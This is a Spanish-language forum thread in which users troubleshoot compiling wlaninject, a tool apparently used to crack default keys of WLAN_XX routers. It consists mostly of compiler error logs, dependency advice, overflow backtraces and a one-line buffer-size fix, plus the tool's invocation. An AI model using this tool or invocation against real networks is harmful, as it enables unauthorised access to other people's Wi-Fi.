wlaninject.c: In function ‘do_libnet_init’:
wlaninject.c:226: error: ‘libnet’ undeclared (first use in this function)
wlaninject.c:226: error: (Each undeclared identifier is reported only once
wlaninject.c:226: error: for each function it appears in.)
wlaninject.c:228: avís: implicit declaration of function ‘libnet_destroy’
wlaninject.c:236: avís: implicit declaration of function ‘libnet_init’
wlaninject.c:236: error: ‘LIBNET_LINK’ undeclared (first use in this function)
wlaninject.c: In function ‘pingip_send’:
wlaninject.c:247: error: expected ‘=’, ‘,’, ‘;’, ‘asm’ or ‘__attribute__’ before ‘arp’
wlaninject.c:247: error: ‘arp’ undeclared (first use in this function)
wlaninject.c:247: error: ‘eth’ undeclared (first use in this function)
wlaninject.c:247: avís: l'operador del costat esquerre de l'expressió coma no té efecte
wlaninject.c:259: error: ‘libnet’ undeclared (first use in this function)
wlaninject.c:260: error: too many arguments to function ‘libnet_build_arp’
wlaninject.c:262: avís: implicit declaration of function ‘libnet_geterror’
wlaninject.c:262: avís: format ‘%s’ expects type ‘char *’, but argument 3 has type ‘int’
wlaninject.c:271: error: too many arguments to function ‘libnet_build_ethernet’
wlaninject.c:273: avís: format ‘%s’ expects type ‘char *’, but argument 3 has type ‘int’
wlaninject.c:279: avís: implicit declaration of function ‘libnet_write’
wlaninject.c:281: avís: format ‘%s’ expects type ‘char *’, but argument 3 has type ‘int’
wlaninject.c: In function ‘main’:
wlaninject.c:569: error: ‘libnet’ undeclared (first use in this function)
wlaninject.c:569: error: too few arguments to function ‘libnet_get_hwaddr’
wlaninject.c:571: avís: format ‘%s’ expects type ‘char *’, but argument 3 has type ‘int’
wlaninject.c:577: avís: implicit declaration of function ‘libnet_get_ipaddr4’
wlaninject.c:577: avís: comparança entre signed i unsigned
wlaninject.c:579: avís: format ‘%s’ expects type ‘char *’, but argument 3 has type ‘int’
wlaninject.c:602: avís: comparança entre signed i unsigned
wlaninject.c:610: avís: comparança entre signed i unsigned
make: *** [wlaninject.o] Error 1

Ya no se que hacer, y ya he hecho: sudo apt-get build-dep aircrack-ng; sudo apt-get install -y libnet0 libnet1 libnet1-dev libpcap0.7 libpcap0.7-dev libpcap0.8 y tengo instalado el ultimo libnet y el libpcap 0.8.1 ....

Alguna idea ???

GRACIAS !


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: chakal1984 en 10 Agosto 2008, 19:53 pm
a mi me interesa seriamente, lo que el link de descarga esta roto, alguien sabe donde puedo descargarme esta utilidad?gracias


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: chakal1984 en 14 Agosto 2008, 20:59 pm
He instalado en WiFiSlax 3.1 librerias Latest Beta Version: 1.1.3
http://www.packetfactory.net/libnet/
Luego Wlaninject 0.6 sin problemmas.
 ;D ;D ;D ;D

pues di como lo has echo porque yo me e vuelto loco probando


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: jeremy13 en 6 Septiembre 2008, 09:10 am
Estoy volviendome loco buscando esta aplicación. El enlace de descarga está roto y no consigo encontrarlo por ningún lado. Sería alguien tan amable de colgarlo en algún sitio, mandarmelo o algo por el estilo?  :rolleyes:


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: iea en 10 Septiembre 2008, 20:13 pm
Que hay; existe un nuevo programa se llama wlanforge, mejor dicho es la  modificacion, de ese programa, poner buscar, si alguno lo llega a tener, que lo comparta...


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: odbk en 28 Septiembre 2008, 14:29 pm
Hola estaba buscando el wlaninject y nada no habia forma d eencontrarlo y la verdad es que me entro curiosidad por saber el motivo de por que no aparece en ninguna parte le han denunciado o algo¿?


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: iea en 29 Septiembre 2008, 18:53 pm
Lo ultimo es el wlanforge poner eso en el google junto a fonera,y saldra otro foro, y alli esta el autor, le mande un privado pero ni caso, es un programa que forja, crea un paquete para reinyectarlo mas efectivo.

Sobre wlaninject si buscas con el google, lo encontaras, pero de   le hace falta dos librerias, libnet y pcap, creo recordar y una de ellas dependiendo de la version y la distro esta jodida de instalar.
Todo esta en este hilo, u si no pon en el buscador de este foro u en el de seguridadwireless "romper wlan_xx en menos de un minuto" y a leer


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: odbk en 30 Septiembre 2008, 06:41 am
pues yo me he hartao de buscar y el unico que he encontrato ha sido el wlaninject 0.6 pero para debian en arquitectura arm


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: LSDios en 6 Octubre 2008, 11:33 am
odnk me pasa lo mismo que ha ti, no hay manera de encontrar ni este ni la version 0.4 y del wlanforge para la fonera idem de idem
¿alguien kelo tega y lo pueda pasar???


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: odbk en 11 Octubre 2008, 21:13 pm
Pues en el wifiway 1.0 beta 2 anda LSDIOS


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: *dudux en 11 Octubre 2008, 22:01 pm
aqui teneis todas laas versiones

quien guarda siempre tiene

http://foro.elhacker.net/wireless_en_linux/todas_las_versiones_de_wlaninject-t231023.0.html;msg1100810#msg1100810

el wlanforge lo debo tener por alguna fonera


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: brose en 15 Octubre 2008, 17:16 pm
Hola;

Cuando intento asociar mi tarjeta a un essid con este comando

iwconfig eth1 essid WLAN_XX

me da un error, porque dice q no es soportado o algo asi, ¿tengo q utilizar otra?

La que uso es la que trae el portatil que imagino que será una intel 3945...

un saludo


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: david238 en 18 Octubre 2008, 11:43 am
A menos que se le haya ocurrido a el, o se haya inspirado en mi idea xD ( http://foro.elhacker.net/wireless_en_linux/ayuda_wifislax_31_y_tarjeta_conceptronic_54g_wireless_pci_cardrt61-t211286.0.html;msg1003064 ,respuesta 10#) no consigo entender el porque hacerlo en linux.
Aun así muy buena idea el haber hecho ese script, yo solo hacia la chapuza con windows, y al final me fue bien con mi red, despues de mucho tiempo lo consegui sin que hubiera clientes.
Lo bueno de ese script, es que no hacen falta 2 PC's.

Muy bueno el script ;)

Salu2.

EDITO: Rectifico, el programa es mucho mas antiguo que mi post, lo siento por mi estupidez.


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: *dudux en 4 Noviembre 2008, 15:40 pm
Hola;

Cuando intento asociar mi tarjeta a un essid con este comando

iwconfig eth1 essid WLAN_XX

me da un error, porque dice q no es soportado o algo asi, ¿tengo q utilizar otra?

La que uso es la que trae el portatil que imagino que será una intel 3945...

un saludo

que error?


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: HierroHierro en 11 Abril 2009, 21:11 pm
Hola a todos !
Primero, felicidades por la web, es genial y se aprende un monton !
Os cuento, estaba yo con el wlainject, a ver si lo puedo instalar, y despues de instalar todas las librerias que me iba pidiendo y leer muuuuuuchos post, me he quedado encallado aqui:

sudo make

gcc -Os -I. -lnet -lpcap -W -Wall  -MMD    -c wlaninject.c
En el fitxer inclòs dès de wlaninject.c:39:
/usr/include/libnet.h:87:2: error: #error "byte order has not been specified, you'll need to #define either LIBNET_LIL_ENDIAN or LIBNET_BIG_ENDIAN.  See the documentation regarding the libnet-config script."
wlaninject.c:73: error: expected ‘=’, ‘,’, ‘;’, ‘asm’ or ‘__attribute__’ before ‘*’ token
wlaninject.c: In function ‘do_libnet_init’:
wlaninject.c:226: error: ‘libnet’ undeclared (first use in this function)
wlaninject.c:226: error: (Each undeclared identifier is reported only once
wlaninject.c:226: error: for each function it appears in.)
wlaninject.c:228: avís: implicit declaration of function ‘libnet_destroy’
wlaninject.c:236: avís: implicit declaration of function ‘libnet_init’
wlaninject.c:236: error: ‘LIBNET_LINK’ undeclared (first use in this function)
wlaninject.c: In function ‘pingip_send’:
wlaninject.c:247: error: expected ‘=’, ‘,’, ‘;’, ‘asm’ or ‘__attribute__’ before ‘arp’
wlaninject.c:247: error: ‘arp’ undeclared (first use in this function)
wlaninject.c:247: error: ‘eth’ undeclared (first use in this function)
wlaninject.c:247: avís: l'operador del costat esquerre de l'expressió coma no té efecte
wlaninject.c:259: error: ‘libnet’ undeclared (first use in this function)
wlaninject.c:260: error: too many arguments to function ‘libnet_build_arp’
wlaninject.c:262: avís: implicit declaration of function ‘libnet_geterror’
wlaninject.c:262: avís: format ‘%s’ expects type ‘char *’, but argument 3 has type ‘int’
wlaninject.c:271: error: too many arguments to function ‘libnet_build_ethernet’
wlaninject.c:273: avís: format ‘%s’ expects type ‘char *’, but argument 3 has type ‘int’
wlaninject.c:279: avís: implicit declaration of function ‘libnet_write’
wlaninject.c:281: avís: format ‘%s’ expects type ‘char *’, but argument 3 has type ‘int’
wlaninject.c: In function ‘main’:
wlaninject.c:569: error: ‘libnet’ undeclared (first use in this function)
wlaninject.c:569: error: too few arguments to function ‘libnet_get_hwaddr’
wlaninject.c:571: avís: format ‘%s’ expects type ‘char *’, but argument 3 has type ‘int’
wlaninject.c:577: avís: implicit declaration of function ‘libnet_get_ipaddr4’
wlaninject.c:577: avís: comparança entre signed i unsigned
wlaninject.c:579: avís: format ‘%s’ expects type ‘char *’, but argument 3 has type ‘int’
wlaninject.c:602: avís: comparança entre signed i unsigned
wlaninject.c:610: avís: comparança entre signed i unsigned
make: *** [wlaninject.o] Error 1

Ya no se que hacer, y ya he hecho: sudo apt-get build-dep aircrack-ng; sudo apt-get install -y libnet0 libnet1 libnet1-dev libpcap0.7 libpcap0.7-dev libpcap0.8 y tengo instalado el ultimo libnet y el libpcap 0.8.1 ....

Alguna idea ???

GRACIAS !


Tengo el mismo problema que el... alguien tiene alguna solución??


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: *dudux en 11 Abril 2009, 22:24 pm
ubuntu o debian?

reinstala libnet y libnet-dev a ver


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: HierroHierro en 12 Abril 2009, 00:48 am
ubuntu o debian?

reinstala libnet y libnet-dev a ver
Uso el BT4, ya que es el único que me reconoce la tarjeta interna del PC, y así puedo usar la interna y una USB para el wlaninject...


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: *dudux en 12 Abril 2009, 01:16 am
bt4 es ubuntudebian asi que no deberias de tener problemas

pega exactamente error


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: HierroHierro en 12 Abril 2009, 01:37 am
bt4 es ubuntudebian asi que no deberias de tener problemas

pega exactamente error

Es el mismo que la cita anterior:

make: *** [wlaninject.o] Error 1


El código completo es:
make
gcc -Os -I. -lnet -lpcap -lpcre -W -Wall  -MMD    -fPIC -c -o iwlib.so iwlib.c
iwlib.c: In function ‘iw_enum_devices’:
iwlib.c:217: warning: ignoring return value of ‘fgets’, declared with attribute warn_unused_result
iwlib.c:218: warning: ignoring return value of ‘fgets’, declared with attribute warn_unused_result
iwlib.c: In function ‘iw_get_kernel_we_version’:
iwlib.c:300: warning: ignoring return value of ‘fgets’, declared with attribute warn_unused_result
iwlib.c:316: warning: ignoring return value of ‘fgets’, declared with attribute warn_unused_result
rm -f libiw.a
ar cru libiw.a iwlib.so
ranlib libiw.a
gcc -Os -I. -lnet -lpcap -lpcre -W -Wall  -MMD    -c wlaninject.c
wlaninject.c:42:18: warning: pcre.h: No such file or directory
wlaninject.c:425: error: expected ‘=’, ‘,’, ‘;’, ‘asm’ or ‘__attribute__’ before ‘*’ token
wlaninject.c:450: error: expected declaration specifiers or ‘...’ before ‘pcre’
wlaninject.c: In function ‘checkpackets’:
wlaninject.c:475: warning: implicit declaration of function ‘getline’
wlaninject.c:479: warning: implicit declaration of function ‘pcre_exec’
wlaninject.c:480: error: ‘re’ undeclared (first use in this function)
wlaninject.c:480: error: (Each undeclared identifier is reported only once
wlaninject.c:480: error: for each function it appears in.)
wlaninject.c:494: warning: implicit declaration of function ‘pcre_get_substring’
wlaninject.c:496: warning: implicit declaration of function ‘pcre_free_substring’
wlaninject.c: In function ‘main’:
wlaninject.c:865: error: ‘pcre’ undeclared (first use in this function)
wlaninject.c:865: error: ‘re’ undeclared (first use in this function)
wlaninject.c:934: warning: comparison between signed and unsigned
wlaninject.c:962: warning: comparison between signed and unsigned
wlaninject.c:970: warning: comparison between signed and unsigned
wlaninject.c:999: warning: implicit declaration of function ‘buildregexp’
wlaninject.c:1002: error: too many arguments to function ‘checkpackets’
wlaninject.c:1080: error: too many arguments to function ‘checkpackets’
wlaninject.c:864: warning: unused variable ‘fnetdev’
make: *** [wlaninject.o] Error 1


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: *dudux en 12 Abril 2009, 10:06 am
los signos esos no dan buen rollo  :P

reinstala libnet y libpcap con apt o a mano
y recompila usando antes make clean && make && make install


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: HierroHierro en 12 Abril 2009, 22:45 pm
los signos esos no dan buen rollo  :P

reinstala libnet y libpcap con apt o a mano
y recompila usando antes make clean && make && make install

Pues no podré instalarlo... porque me dice que mi sistema es incompatible con el libpcap...


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: *dudux en 12 Abril 2009, 23:41 pm
los signos esos no dan buen rollo  :P

reinstala libnet y libpcap con apt o a mano
y recompila usando antes make clean && make && make install

Pues no podré instalarlo... porque me dice que mi sistema es incompatible con el libpcap...

como no va a llevar libpcap una distro como BACKTQRACK de auditorias?¿


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: HierroHierro en 13 Abril 2009, 17:09 pm
los signos esos no dan buen rollo  :P

reinstala libnet y libpcap con apt o a mano
y recompila usando antes make clean && make && make install

Pues no podré instalarlo... porque me dice que mi sistema es incompatible con el libpcap...

como no va a llevar libpcap una distro como BACKTQRACK de auditorias?¿
Pues cuando intento reinstalarla al hacer el configure me dice que mi sistema no es compatible con libpcap


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: fuenteRea en 13 Abril 2009, 22:33 pm
no te gusta wifiway 1.0 final??, ya lo tiene, un saludo!!


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: HierroHierro en 14 Abril 2009, 15:18 pm
Si me gusta, pero ese no me reconoce la tarjeta wifi interna del PC, solo la USB, y para el wlaninject necesito 2...


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: fuenteRea en 14 Abril 2009, 15:28 pm
Si me gusta, pero ese no me reconoce la tarjeta wifi interna del PC, solo la USB, y para el wlaninject necesito 2...

pues metele los driver, digo yo que es mas facil eso que la que estas liando con el wlaninject no?
un saludo!!


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: HierroHierro en 18 Abril 2009, 12:35 pm
Si me gusta, pero ese no me reconoce la tarjeta wifi interna del PC, solo la USB, y para el wlaninject necesito 2...

pues metele los driver, digo yo que es mas facil eso que la que estas liando con el wlaninject no?
un saludo!!
Pero los driver para mi tarjeta no están por internet... no se de donde los han sacado los de BT4


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: VTCop en 2 Mayo 2009, 18:44 pm
Yo estoy intentando compilar wlaninject 0.7 en Ubuntu Inteprid Ibex y obtengo el mismo error.
Código:
$make
gcc -Os -I. -lnet -lpcap -lpcre -W -Wall  -MMD    -fPIC -c -o iwlib.so iwlib.c
iwlib.c: En la función ‘iw_enum_devices’:
iwlib.c:217: aviso: se descarta el valor de devolución de ‘fgets’, se declaró con el atributo warn_unused_result
iwlib.c:218: aviso: se descarta el valor de devolución de ‘fgets’, se declaró con el atributo warn_unused_result
iwlib.c: En la función ‘iw_get_kernel_we_version’:
iwlib.c:300: aviso: se descarta el valor de devolución de ‘fgets’, se declaró con el atributo warn_unused_result
iwlib.c:316: aviso: se descarta el valor de devolución de ‘fgets’, se declaró con el atributo warn_unused_result
rm -f libiw.a
ar cru libiw.a iwlib.so
ranlib libiw.a
gcc -Os -I. -lnet -lpcap -lpcre -W -Wall  -MMD    -c wlaninject.c
wlaninject.c:42:18: aviso: pcre.h: No existe el fichero ó directorio
wlaninject.c:425: error: expected ‘=’, ‘,’, ‘;’, ‘asm’ or ‘__attribute__’ before ‘*’ token
wlaninject.c:450: error: expected declaration specifiers or ‘...’ before ‘pcre’
wlaninject.c: En la función ‘checkpackets’:
wlaninject.c:475: aviso: declaración implícita de la función ‘getline’
wlaninject.c:479: aviso: declaración implícita de la función ‘pcre_exec’
wlaninject.c:480: error: ‘re’ no se declaró aquí (primer uso en esta función)
wlaninject.c:480: error: (Cada identificador no declarado solamente se reporta una vez
wlaninject.c:480: error: para cada funcion en la que aparece.)
wlaninject.c:494: aviso: declaración implícita de la función ‘pcre_get_substring’
wlaninject.c:496: aviso: declaración implícita de la función ‘pcre_free_substring’
wlaninject.c: En la función ‘main’:
wlaninject.c:865: error: ‘pcre’ no se declaró aquí (primer uso en esta función)
wlaninject.c:865: error: ‘re’ no se declaró aquí (primer uso en esta función)
wlaninject.c:934: aviso: comparación entre signed y unsigned
wlaninject.c:962: aviso: comparación entre signed y unsigned
wlaninject.c:970: aviso: comparación entre signed y unsigned
wlaninject.c:999: aviso: declaración implícita de la función ‘buildregexp’
wlaninject.c:1002: error: demasiados argumentos para la función ‘checkpackets’
wlaninject.c:1080: error: demasiados argumentos para la función ‘checkpackets’
wlaninject.c:864: aviso: variable ‘fnetdev’ sin usar
make: *** [wlaninject.o] Error 1

De aquí destacaría el pcre.h: no encontado
A pesar de no conseguir compilar la 0.7, esta traía un fichero ya compilado, que me funciona perfectamente. Si quiero volver a compilar es sólamente para añadir nuevas macs


He probado a compilar la versión 0.6 y esa sí que me compila bien, pero sin embargo cuando voy a ejecutarla me da un error de overflow:
Código:
$./wlaninject -e WLAN_XX -b xx:xx:xx:xx:xx -i ath0
*** buffer overflow detected ***: ./wlaninject terminated
======= Backtrace: =========
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x48)[0xb7e4d6d8]
/lib/tls/i686/cmov/libc.so.6[0xb7e4b800]
/lib/tls/i686/cmov/libc.so.6[0xb7e4ade5]
./wlaninject[0x8049a86]
/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe5)[0xb7d69685]
./wlaninject[0x8049371]
======= Memory map: ========
08048000-0804f000 r-xp 00000000 08:12 307368     /home/tommy/wifi/wlaninject/wlaninject-0.6/wlaninject
0804f000-08050000 r--p 00006000 08:12 307368     /home/tommy/wifi/wlaninject/wlaninject-0.6/wlaninject
08050000-08051000 rw-p 00007000 08:12 307368     /home/tommy/wifi/wlaninject/wlaninject-0.6/wlaninject
098cb000-098ec000 rw-p 098cb000 00:00 0          [heap]
b7d43000-b7d50000 r-xp 00000000 08:12 137119     /lib/libgcc_s.so.1
b7d50000-b7d51000 r--p 0000c000 08:12 137119     /lib/libgcc_s.so.1
b7d51000-b7d52000 rw-p 0000d000 08:12 137119     /lib/libgcc_s.so.1
b7d52000-b7d53000 rw-p b7d52000 00:00 0
b7d53000-b7eab000 r-xp 00000000 08:12 156105     /lib/tls/i686/cmov/libc-2.8.90.so
b7eab000-b7ead000 r--p 00158000 08:12 156105     /lib/tls/i686/cmov/libc-2.8.90.so
b7ead000-b7eae000 rw-p 0015a000 08:12 156105     /lib/tls/i686/cmov/libc-2.8.90.so
b7eae000-b7eb1000 rw-p b7eae000 00:00 0
b7eb1000-b7ed5000 r-xp 00000000 08:12 156110     /lib/tls/i686/cmov/libm-2.8.90.so
b7ed5000-b7ed6000 r--p 00023000 08:12 156110     /lib/tls/i686/cmov/libm-2.8.90.so
b7ed6000-b7ed7000 rw-p 00024000 08:12 156110     /lib/tls/i686/cmov/libm-2.8.90.so
b7ed7000-b7ed8000 rw-p b7ed7000 00:00 0
b7ed8000-b7f01000 r-xp 00000000 08:12 277109     /usr/lib/libpcap.so.0.9.8
b7f01000-b7f02000 r--p 00028000 08:12 277109     /usr/lib/libpcap.so.0.9.8
b7f02000-b7f03000 rw-p 00029000 08:12 277109     /usr/lib/libpcap.so.0.9.8
b7f03000-b7f16000 r-xp 00000000 08:12 278007     /usr/lib/libnet.so.1.3.0
b7f16000-b7f17000 rw-p 00013000 08:12 278007     /usr/lib/libnet.so.1.3.0
b7f17000-b7f18000 rw-p b7f17000 00:00 0
b7f29000-b7f2b000 rw-p b7f29000 00:00 0
b7f2b000-b7f45000 r-xp 00000000 08:12 137308     /lib/ld-2.8.90.so
b7f45000-b7f46000 r-xp b7f45000 00:00 0          [vdso]
b7f46000-b7f47000 r--p 0001a000 08:12 137308     /lib/ld-2.8.90.so
b7f47000-b7f48000 rw-p 0001b000 08:12 137308     /lib/ld-2.8.90.so
bfc32000-bfc47000 rw-p bffeb000 00:00 0          [stack]
Cancelado


¿alguna idea?
Tan sólo quiero que me funcione wlaninject con las macs 00:02:CF
He probado a copiarme la version compilada de wifiway 1.0 final, pero al ejecutarla en mi ubuntu me dice
Código:
./wlaninject: error while loading shared libraries: libnet.so.0: cannot open shared object file: No such file or directory

Ya me he queda poco que probar...


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: VTCop en 2 Mayo 2009, 18:54 pm
Vale, ya he conseguido eliminar el error de pcre.h no encontrado simplemente haciendo
Código:
apt-get install libpcre3-dev

Ahora ya consigo compilar wlaninject 0.7 en Ubuntu Intrepid Ibex, aunque sigue dando algunos warnings
Código:
gcc -Os -I. -lnet -lpcap -lpcre -W -Wall  -MMD    -fPIC -c -o iwlib.so iwlib.c
iwlib.c: En la función ‘iw_enum_devices’:
iwlib.c:217: aviso: se descarta el valor de devolución de ‘fgets’, se declaró con el atributo warn_unused_result
iwlib.c:218: aviso: se descarta el valor de devolución de ‘fgets’, se declaró con el atributo warn_unused_result
iwlib.c: En la función ‘iw_get_kernel_we_version’:
iwlib.c:300: aviso: se descarta el valor de devolución de ‘fgets’, se declaró con el atributo warn_unused_result
iwlib.c:316: aviso: se descarta el valor de devolución de ‘fgets’, se declaró con el atributo warn_unused_result
rm -f libiw.a
ar cru libiw.a iwlib.so
ranlib libiw.a
gcc -Os -I. -lnet -lpcap -lpcre -W -Wall  -MMD    -c wlaninject.c
wlaninject.c: En la función ‘buildregexp’:
wlaninject.c:432: aviso: se pasa el argumento 1 de ‘strcpy’ desde un tipo de puntero incompatible
wlaninject.c:433: aviso: se pasa el argumento 1 de ‘strcat’ desde un tipo de puntero incompatible
wlaninject.c: En la función ‘checkpackets’:
wlaninject.c:475: aviso: declaración implícita de la función ‘getline’
wlaninject.c:494: aviso: se pasa el argumento 5 de ‘pcre_get_substring’ desde un tipo de puntero incompatible
wlaninject.c:498: aviso: se pasa el argumento 5 de ‘pcre_get_substring’ desde un tipo de puntero incompatible
wlaninject.c:502: aviso: se pasa el argumento 5 de ‘pcre_get_substring’ desde un tipo de puntero incompatible
wlaninject.c: En la función ‘main’:
wlaninject.c:934: aviso: comparación entre signed y unsigned
wlaninject.c:962: aviso: comparación entre signed y unsigned
wlaninject.c:970: aviso: comparación entre signed y unsigned
wlaninject.c:864: aviso: variable ‘fnetdev’ sin usar
wlaninject.c: En el nivel principal:
wlaninject.c:91: aviso: se definió ‘numsent’ pero no se usa
En la función ‘strncpy’,
    incluído en línea de ‘main’ en wlaninject.c:890:
/usr/include/bits/string3.h:122: aviso: la llamada a __builtin___strncpy_chk siempre desbordará el almacenamiento temporal destino
gcc   -Os -I. -lnet -lpcap -lpcre -W -Wall  -MMD    -o wlaninject wlaninject.o libiw.a -lm

Sin embargo sigue sin funcionar, pues cuando lo ejecuto:
Código:
*** buffer overflow detected ***: ./wlaninject terminated
======= Backtrace: =========
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x48)[0xb7e9c6d8]
/lib/tls/i686/cmov/libc.so.6[0xb7e9a800]
/lib/tls/i686/cmov/libc.so.6[0xb7e99de5]
./wlaninject[0x804a070]
/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe5)[0xb7db8685]
./wlaninject[0x8049591]
======= Memory map: ========
08048000-0804f000 r-xp 00000000 08:12 270279     /home/tommy/wifi/wlaninject/wlaninject-0.7rc4/wlaninject
0804f000-08050000 r--p 00006000 08:12 270279     /home/tommy/wifi/wlaninject/wlaninject-0.7rc4/wlaninject
08050000-08051000 rw-p 00007000 08:12 270279     /home/tommy/wifi/wlaninject/wlaninject-0.7rc4/wlaninject
084ce000-084ef000 rw-p 084ce000 00:00 0          [heap]
b7d92000-b7d9f000 r-xp 00000000 08:12 137119     /lib/libgcc_s.so.1
b7d9f000-b7da0000 r--p 0000c000 08:12 137119     /lib/libgcc_s.so.1
b7da0000-b7da1000 rw-p 0000d000 08:12 137119     /lib/libgcc_s.so.1
b7da1000-b7da2000 rw-p b7da1000 00:00 0
b7da2000-b7efa000 r-xp 00000000 08:12 156105     /lib/tls/i686/cmov/libc-2.8.90.so
b7efa000-b7efc000 r--p 00158000 08:12 156105     /lib/tls/i686/cmov/libc-2.8.90.so
b7efc000-b7efd000 rw-p 0015a000 08:12 156105     /lib/tls/i686/cmov/libc-2.8.90.so
b7efd000-b7f00000 rw-p b7efd000 00:00 0
b7f00000-b7f24000 r-xp 00000000 08:12 156110     /lib/tls/i686/cmov/libm-2.8.90.so
b7f24000-b7f25000 r--p 00023000 08:12 156110     /lib/tls/i686/cmov/libm-2.8.90.so
b7f25000-b7f26000 rw-p 00024000 08:12 156110     /lib/tls/i686/cmov/libm-2.8.90.so
b7f26000-b7f4e000 r-xp 00000000 08:12 137163     /lib/libpcre.so.3.12.1
b7f4e000-b7f4f000 r--p 00027000 08:12 137163     /lib/libpcre.so.3.12.1
b7f4f000-b7f50000 rw-p 00028000 08:12 137163     /lib/libpcre.so.3.12.1
b7f50000-b7f51000 rw-p b7f50000 00:00 0
b7f51000-b7f7a000 r-xp 00000000 08:12 277109     /usr/lib/libpcap.so.0.9.8
b7f7a000-b7f7b000 r--p 00028000 08:12 277109     /usr/lib/libpcap.so.0.9.8
b7f7b000-b7f7c000 rw-p 00029000 08:12 277109     /usr/lib/libpcap.so.0.9.8
b7f7c000-b7f8f000 r-xp 00000000 08:12 278007     /usr/lib/libnet.so.1.3.0
b7f8f000-b7f90000 rw-p 00013000 08:12 278007     /usr/lib/libnet.so.1.3.0
b7f90000-b7f91000 rw-p b7f90000 00:00 0
b7fa2000-b7fa4000 rw-p b7fa2000 00:00 0
b7fa4000-b7fbe000 r-xp 00000000 08:12 137308     /lib/ld-2.8.90.so
b7fbe000-b7fbf000 r-xp b7fbe000 00:00 0          [vdso]
b7fbf000-b7fc0000 r--p 0001a000 08:12 137308     /lib/ld-2.8.90.so
b7fc0000-b7fc1000 rw-p 0001b000 08:12 137308     /lib/ld-2.8.90.so
bfcac000-bfcc1000 rw-p bffeb000 00:00 0          [stack]
Cancelado

 :huh:


Título: Re: Wlaninject 0.6 - Ahora con cafeina, mucho más rapido!!
Publicado por: VTCop en 3 Mayo 2009, 10:38 am
Vale, sigo encabezonado en compilar wlaninject en mi Ubuntu.
Ya he encontrado el fallo del primer overflow.
Para evitarlo hay que modificar la línea 858 de wlaninject.c, donde se declara la variable bssid.
Originalmente
Código:
char bssid[17];
Hay que modificarla a
Código:
char bssid[18];

Le faltaba uno para almacenar el carácter fin de cadena, por lo que la orden de la línea 890
Código:
strncpy(bssid, optarg, 18);
provocaba un overflow.

Ahora ya no lo provoca ahí, sino en otro sitio  :D

Código:
   wlaninject 0.7 - (c) 2006 nilp0inter2k6_at_gmail.com
  ------------>  http://www.rusoblanco.com  <------------

 [+] BSSID: 00:16:38:XX:XX:XX
 [+] Modelo: Comtrend 536+
 [+] ESSID: WLAN_XX
 [+] Progreso: 1%  *** buffer overflow detected ***: ./wlaninject terminated
======= Backtrace: =========
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x48)[0xb7f2b6d8]
/lib/tls/i686/cmov/libc.so.6[0xb7f29800]
/lib/tls/i686/cmov/libc.so.6[0xb7f28ef8]
/lib/tls/i686/cmov/libc.so.6(__overflow+0x53)[0xb7e9f543]
/lib/tls/i686/cmov/libc.so.6(_IO_vfprintf+0x4c3a)[0xb7e755fa]
/lib/tls/i686/cmov/libc.so.6(__vsprintf_chk+0xa4)[0xb7f28fa4]
/lib/tls/i686/cmov/libc.so.6(__sprintf_chk+0x2d)[0xb7f28eed]
./wlaninject[0x804a53c]
/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe5)[0xb7e47685]
./wlaninject[0x8049551]
======= Memory map: ========
08048000-0804f000 r-xp 00000000 08:12 270281     /home/tommy/wifi/wlaninject/wlaninject-0.7rc4/wlaninject
0804f000-08050000 r--p 00006000 08:12 270281     /home/tommy/wifi/wlaninject/wlaninject-0.7rc4/wlaninject
08050000-08051000 rw-p 00007000 08:12 270281     /home/tommy/wifi/wlaninject/wlaninject-0.7rc4/wlaninject
083ca000-083eb000 rw-p 083ca000 00:00 0          [heap]
b7e30000-b7e31000 rw-p b7e30000 00:00 0
b7e31000-b7f89000 r-xp 00000000 08:12 156105     /lib/tls/i686/cmov/libc-2.8.90.so
b7f89000-b7f8b000 r--p 00158000 08:12 156105     /lib/tls/i686/cmov/libc-2.8.90.so
b7f8b000-b7f8c000 rw-p 0015a000 08:12 156105     /lib/tls/i686/cmov/libc-2.8.90.so
b7f8c000-b7f8f000 rw-p b7f8c000 00:00 0
